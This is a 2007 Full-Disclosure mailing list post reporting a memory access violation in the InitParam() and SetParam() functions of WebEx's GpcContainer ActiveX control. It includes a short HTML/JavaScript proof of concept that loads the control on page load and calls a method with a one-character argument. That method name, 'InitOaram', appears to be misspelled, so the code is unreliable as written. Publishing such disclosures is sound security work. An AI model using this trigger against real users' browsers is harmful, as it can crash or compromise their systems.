[Full-disclosure] WebEx GPCContainer Memory Access Violation
- From: Elazar Broad <elazarb@xxxxxxxxxxxxx>
- Date: Tue, 13 Nov 2007 11:50:33 -0500 (GMT-05:00)
There is a memory access violation in the InitParam() and SetParam() functions. PoC as follows:
---------------------
<!--
Written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj = new ActiveXObject("GpcContainer.GpcContainer.1");
obj.InitOaram("A");
}
</script>
</head>
<body onLoad="JavaScript: return Check();">
</body>
</html>
---------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] iDefense Security Advisory 11.12.07: Novell NetWare Client Local Privilege Escalation Vulnerability
- Next by Date: [Full-disclosure] [paper] protocol hopping covert channels
- Previous by thread: [Full-disclosure] iDefense Security Advisory 11.12.07: Novell NetWare Client Local Privilege Escalation Vulnerability
- Next by thread: Re: [Full-disclosure] WebEx GPCContainer Memory Access Violation
- Index(es):
Relevant Pages
|
